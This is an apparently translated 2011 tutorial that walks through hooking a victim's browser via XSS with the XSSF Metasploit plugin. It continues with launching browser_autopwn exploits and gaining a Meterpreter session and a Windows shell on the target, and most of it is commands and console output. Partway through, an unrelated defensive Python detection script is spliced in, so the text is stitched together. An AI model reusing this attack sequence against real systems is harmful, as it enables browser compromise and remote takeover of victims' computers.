author:RootkitHat.Org
This may look like showing off, but how else do you find out what operating system and browser your target is using? A similar tool is available here: http://xss-proxy.sourceforge.net. Attachment: Path /sploits/2011/06/XSSF.zip. After extracting it, copy the whole contents of the attachment into /msf3/. Then start Metasploit, create the database, and load the plugin.
[Metasploit ASCII-art banner]
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11089 updated 239 days ago (2010.11.22)
Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:toor@127.0.0.1/xssftest
msf > load xssf
[XSSF ASCII-art banner] Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security
[+] Server started : http://192.168.56.101:8888/
[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF
If the IP shown is not your external IP, edit /opt/metasploit3/msf3/plugins/xssf.rb and replace 0,0,0,0 with your external IP. Then get the target machine to load “http://192.168.56.101:8888/loop” through the XSS.
List the XSS sessions:
msf > xssf_victims
Victims
=======
id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES
[*] Use xssf_information [VictimID] to see more information about a victim
true means the session is usable.
Connect to the XSS session:
msf > xssf_information 1
INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 192.168.56.1
ACTIVE : TRUE
FIRST REQUEST : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ? : YES
RUNNING ATTACK : NONE
How to obtain system access:
Use the Metasploit module to automatically set up a number of browser exploits. Note that the port must not be the same as the XSSF plugin's port.
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.56.101...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...
[*] --- Done, found 16 exploit modules
[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.
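From the defender's side, the two stages shown above leave a distinctive trace in web-proxy logs: a hooked browser polls the XSSF `/loop` resource at a fixed short interval (the `interval` column in the victims table is 2 seconds), and when browser_autopwn is pointed at it the same client then fetches a burst of distinct random-path URLs from one host:port within a few seconds. The script below is an added example and not part of the original post or of XSSF or Metasploit; the log format, the sample log lines, the function names and the thresholds are all constructed for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import pstdev
from urllib.parse import urlsplit

# Constructed sample proxy log (not from the original post). Format assumed:
# "<ISO timestamp> <client ip> <method> <url> <status>".
# One client polls /loop every 2 s, then is steered to five random-path URLs
# on port 8081; a second client does ordinary browsing.
SAMPLE_LOG = """\
2011-07-19T23:30:25 192.168.56.1 GET http://192.168.56.101:8888/loop 200
2011-07-19T23:30:27 192.168.56.1 GET http://192.168.56.101:8888/loop 200
2011-07-19T23:30:29 192.168.56.1 GET http://192.168.56.101:8888/loop 200
2011-07-19T23:30:31 192.168.56.1 GET http://192.168.56.101:8888/loop 200
2011-07-19T23:30:33 192.168.56.1 GET http://192.168.56.101:8888/loop 200
2011-07-19T23:30:34 192.168.56.1 GET http://192.168.56.101:8081/GpI7DbKJ2wp5kS 200
2011-07-19T23:30:35 192.168.56.1 GET http://192.168.56.101:8081/xFm6pSwb 200
2011-07-19T23:30:36 192.168.56.1 GET http://192.168.56.101:8081/yVJcsYOtv 200
2011-07-19T23:30:37 192.168.56.1 GET http://192.168.56.101:8081/JaT9yvjsEik 200
2011-07-19T23:30:40 192.168.56.1 GET http://192.168.56.101:8081/Xy5LvGuPst 200
2011-07-19T23:30:41 10.0.0.7 GET http://intranet.example/index.html 200
2011-07-19T23:31:02 10.0.0.7 GET http://intranet.example/news.html 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
# browser_autopwn-style URI: a bare alphanumeric path segment with no extension
RANDOM_PATH_RE = re.compile(r"^/[A-Za-z0-9]{6,}$")


def parse_log(text):
    """Parse the assumed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, status = m.groups()
        u = urlsplit(url)
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "method": method, "origin": u.netloc, "path": u.path,
                       "status": int(status)})
    return events


def find_beacons(events, min_hits=4, max_interval=10.0, max_jitter=0.5):
    """Flag (client, origin, path) triples fetched repeatedly at a steady, short interval."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["client"], e["origin"], e["path"])].append(e["ts"])
    findings = []
    for (client, origin, path), times in by_key.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        # a hook loop is both frequent and regular; ordinary browsing is neither
        if mean <= max_interval and pstdev(gaps) <= max_jitter:
            findings.append({"client": client, "origin": origin, "path": path,
                             "hits": len(times), "interval": round(mean, 2)})
    return findings


def find_exploit_fanout(events, min_paths=4, window=30.0):
    """Flag a client fetching many distinct random-looking paths from one origin within `window` seconds."""
    by_pair = defaultdict(list)
    for e in events:
        if RANDOM_PATH_RE.match(e["path"]):
            by_pair[(e["client"], e["origin"])].append((e["ts"], e["path"]))
    findings = []
    for (client, origin), hits in by_pair.items():
        hits.sort()
        for i in range(len(hits)):
            seen = set()
            for ts, path in hits[i:]:
                if (ts - hits[i][0]).total_seconds() > window:
                    break
                seen.add(path)
            if len(seen) >= min_paths:
                findings.append({"client": client, "origin": origin,
                                 "distinct_paths": len(seen),
                                 "first": hits[i][0].isoformat()})
                break
    return findings


def hooked_and_targeted(text):
    """Clients that both beacon and receive an exploit fan-out: the highest-priority alerts."""
    events = parse_log(text)
    beaconers = {b["client"] for b in find_beacons(events)}
    targeted = {f["client"] for f in find_exploit_fanout(events)}
    return sorted(beaconers & targeted)


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("beacons:", find_beacons(ev))
    print("fan-out:", find_exploit_fanout(ev))
    print("hooked and targeted:", hooked_and_targeted(SAMPLE_LOG))
```

The beacon check fires on any fixed-interval poller, so legitimate long-polling or auto-refresh applications need to be allow-listed by origin; the fan-out check is what separates a hooked browser that is being pushed exploit pages from a noisy but benign web app, which is why the combined `hooked_and_targeted` view is the one worth paging on.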
List the available exploits:
msf auxiliary(browser_autopwn) > jobs
Jobs
====
Id Name
-- ----
0 Auxiliary: server/browser_autopwn
1 Exploit: multi/browser/firefox_escape_retval
2 Exploit: multi/browser/java_calendar_deserialize
3 Exploit: multi/browser/java_trusted_chain
4 Exploit: multi/browser/mozilla_compareto
5 Exploit: multi/browser/mozilla_navigatorjava
6 Exploit: multi/browser/opera_configoverwrite
7 Exploit: multi/browser/opera_historysearch
8 Exploit: osx/browser/safari_metadata_archive
9 Exploit: windows/browser/apple_quicktime_marshaled_punk
10 Exploit: windows/browser/apple_quicktime_rtsp
11 Exploit: windows/browser/apple_quicktime_smil_debug
12 Exploit: windows/browser/ie_createobject
13 Exploit: windows/browser/ms03_020_ie_objecttype
14 Exploit: windows/browser/ms10_018_ie_behaviors
15 Exploit: windows/browser/ms10_xxx_ie_css_clip
16 Exploit: windows/browser/winzip_fileview
17 Exploit: multi/handler
18 Exploit: multi/handler
19 Exploit: multi/handler
Choose the exploit module according to the target's operating system.
xssf_exploit 1 12: the first number is the XSS session, the second is the browser exploit number.
msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...
[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)
^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB 192.168.56.101:3333 -> 192.168.56.1:37151
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\dis9team\桌面>
Done.